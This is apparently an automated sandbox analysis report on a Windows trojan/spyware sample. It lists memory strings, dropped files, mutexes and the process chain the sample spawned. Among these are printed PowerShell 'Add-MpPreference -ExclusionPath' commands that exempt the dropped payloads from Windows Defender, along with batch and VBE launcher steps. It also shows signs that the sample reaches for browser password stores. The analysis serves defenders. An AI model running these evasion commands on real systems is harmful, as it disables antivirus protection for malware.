                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013044000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FFE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A64000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AAA000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131A2000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001315C000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139D8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000014689000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FB8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AF0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131E8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001308A000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013116000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A1E000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013312000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013358000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013337000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001337D000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013ACF000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013B15000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A43000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001320D000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013181000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131C7000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000146AE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139FD000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130F5000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130AF000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001313B000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013069000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013023000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A89000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FDD000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013044000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FFE000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A64000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AAA000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131A2000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001315C000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000139D8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000014689000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000012FB8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013AF0000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.00000000131E8000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001308A000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013116000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013A1E000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013312000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013358000.00000004.00000800.00020000.00000000.sdmp, MPtwnE9hJ7.24.dr, fzcLEMqFWg.24.dr, fDVZda3fuM.24.dr, oDJgYeWmJB.24.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: zSQAoKuSDj.24.dr, ONpBu9lcdX.24.dr, 3c8MSY2kPb.24.dr, nE8AJOFfyQ.24.dr, ySQF7nQAph.24.dr, vhc6TzHo0M.24.dr, EK6xeVi4QL.24.dr, WAOW92WiBP.24.dr, tudHfmU2wN.24.dr, IgLlwAztHD.24.dr, 54t12C5XRW.24.dr, XsLHRYlmRG.24.dr, gTDswP1uzF.24.dr, IH2FLS5YIm.24.dr, EI9cgKzK2a.24.dr, oz0rvzAMwL.24.dr, qjLTYIx5bn.24.dr, MsBbgpRl97.24.dr, k9WQ8LJ8Xb.24.dr, VcGfTunSmk.24.dr, M8C0OCeSN5.24.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: UJ59LdJnt9.24.drString found in binary or memory: https://www.mozilla.org
                          Source: UJ59LdJnt9.24.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: UJ59LdJnt9.24.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013B5E000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001405E000.00000004.00000800.00020000.00000000.sdmp, Lq3kejkDls.24.dr, UJ59LdJnt9.24.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                          Source: UJ59LdJnt9.24.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.0000000013B5E000.00000004.00000800.00020000.00000000.sdmp, ZWgKQlTqcrSB.exe, 00000018.00000002.2988187631.000000001405E000.00000004.00000800.00020000.00000000.sdmp, Lq3kejkDls.24.dr, UJ59LdJnt9.24.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWindow created: window name: CLIPBRDWNDCLASS

                          System Summary

                          barindex
                          Windows Scripting host queries suspicious COM object (likely to drop second stage)
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B26FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00B26FAA
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Windows\TAPI\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Windows\TAPI\b2c372d662fd88Jump to behavior
                          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2848E0_2_00B2848E
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B300B70_2_00B300B7
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B340880_2_00B34088
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B240FE0_2_00B240FE
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B451C90_2_00B451C9
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B371530_2_00B37153
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B232F70_2_00B232F7
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B362CA0_2_00B362CA
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B343BF0_2_00B343BF
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2C4260_2_00B2C426
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2F4610_2_00B2F461
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B4D4400_2_00B4D440
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B377EF0_2_00B377EF
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B4D8EE0_2_00B4D8EE
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2286B0_2_00B2286B
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2E9B70_2_00B2E9B7
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B519F40_2_00B519F4
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B36CDC0_2_00B36CDC
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B33E0B0_2_00B33E0B
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B44F9A0_2_00B44F9A
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B2EFE20_2_00B2EFE2
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9B9F34155_2_00007FFD9B9F3415
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9B9E1EC35_2_00007FFD9B9E1EC3
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBB13E05_2_00007FFD9BBB13E0
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBB13CF5_2_00007FFD9BBB13CF
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBB96F25_2_00007FFD9BBB96F2
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA2305_2_00007FFD9BBBA230
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA2505_2_00007FFD9BBBA250
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA1E05_2_00007FFD9BBBA1E0
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA1D05_2_00007FFD9BBBA1D0
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeCode function: 5_2_00007FFD9BBBA1905_2_00007FFD9BBBA190
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD9BAD30E98_2_00007FFD9BAD30E9
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9BA0341524_2_00007FFD9BA03415
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9B9F1EC324_2_00007FFD9B9F1EC3
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9BBC13E024_2_00007FFD9BBC13E0
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9BBC13CF24_2_00007FFD9BBC13CF
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9BBCA16024_2_00007FFD9BBCA160
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9C10C5F624_2_00007FFD9C10C5F6
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeCode function: 24_2_00007FFD9C1096E524_2_00007FFD9C1096E5
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AQlYVRJc.log C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: String function: 00B3EB78 appears 39 times
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: String function: 00B3EC50 appears 56 times
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: String function: 00B3F5F0 appears 31 times
                          Source: updIMdPUj8.exe, 00000000.00000003.1674970927.0000000004F73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs updIMdPUj8.exe
                          Source: updIMdPUj8.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs updIMdPUj8.exe
                          Source: updIMdPUj8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@35/375@0/2
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B26C74 GetLastError,FormatMessageW,0_2_00B26C74
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCode function: 0_2_00B3A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00B3A6C2
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exeJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\cXlUovHQ.logJump to behavior
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeMutant created: \Sessions\1\BaseNamedObjects\Local\8f8e651a25a945ecc390a45c0da3cfc0265e5ce1aa467481e904db157d1d950e
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\AppData\Local\Temp\b9WbqHIwBXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCommand line argument: sfxname0_2_00B3DF1E
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCommand line argument: sfxstime0_2_00B3DF1E
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeCommand line argument: STARTDLG0_2_00B3DF1E
                          Source: updIMdPUj8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: updIMdPUj8.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: xVasebWgWN.24.dr, prpSOqgc4D.24.dr, sCBZb0Pp3Y.24.dr, p6TPa701rJ.24.dr, JkX1ie4U9y.24.dr, h8GMe8gXsd.24.dr, C6WXCYBV07.24.dr, ubM4wnSOhw.24.dr, cnDaRUxtsG.24.dr, esdk4zhMi5.24.dr, sCBnbyN2XR.24.dr, borYX7RWaE.24.dr, 6xsDCHx81L.24.dr, rvup8Xvi7G.24.dr, IhCM28i2mX.24.dr, ulGvJFHis6.24.dr, JzHQCntgPc.24.dr, 4wPz7pNzuT.24.dr, 7DZ9klYdAj.24.dr, nmg5NLyrZF.24.dr, HZug7Ld03I.24.dr, RVnuqQIULS.24.dr, upKGyATyWO.24.dr, skMe0l7Ot3.24.dr, jY5S99BsYy.24.dr, wLcFEoU5tR.24.dr, hzYnIZKYRs.24.dr, jbsTN6qDV8.24.dr, Fg8TsxLY0Z.24.dr, QQfw1bpbuT.24.dr, z9f1OFTytt.24.dr, BcIFAwm04X.24.dr, 7KL2JobGTj.24.dr, EJMkEXj0lk.24.dr, O4Rr8IEjEc.24.dr, SJYPkMlurT.24.dr, g1bTMLHJ7C.24.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: updIMdPUj8.exeVirustotal: Detection: 58%
                          Source: updIMdPUj8.exeReversingLabs: Detection: 68%
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeFile read: C:\Users\user\Desktop\updIMdPUj8.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\updIMdPUj8.exe "C:\Users\user\Desktop\updIMdPUj8.exe"
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\TAPI\ZWgKQlTqcrSB.exe "C:\Windows\TAPI\ZWgKQlTqcrSB.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\BridgeSavesMonitor\wW6msodKQlyf4uIuEtxxIN9vzHkuk0mZkwmTg.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\BridgeSavesMonitor\PiJ39TM3MwLHVAF8MIz1L5IKE7LQcw3.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exe "C:\BridgeSavesMonitor/hypersurrogateComponentdhcp.exe"Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\csrss.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\Accessories\ZWgKQlTqcrSB.exe'Jump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UV4iXMFwPx.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\TAPI\ZWgKQlTqcrSB.exe "C:\Windows\TAPI\ZWgKQlTqcrSB.exe"
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: dwmapi.dllJump to behavior
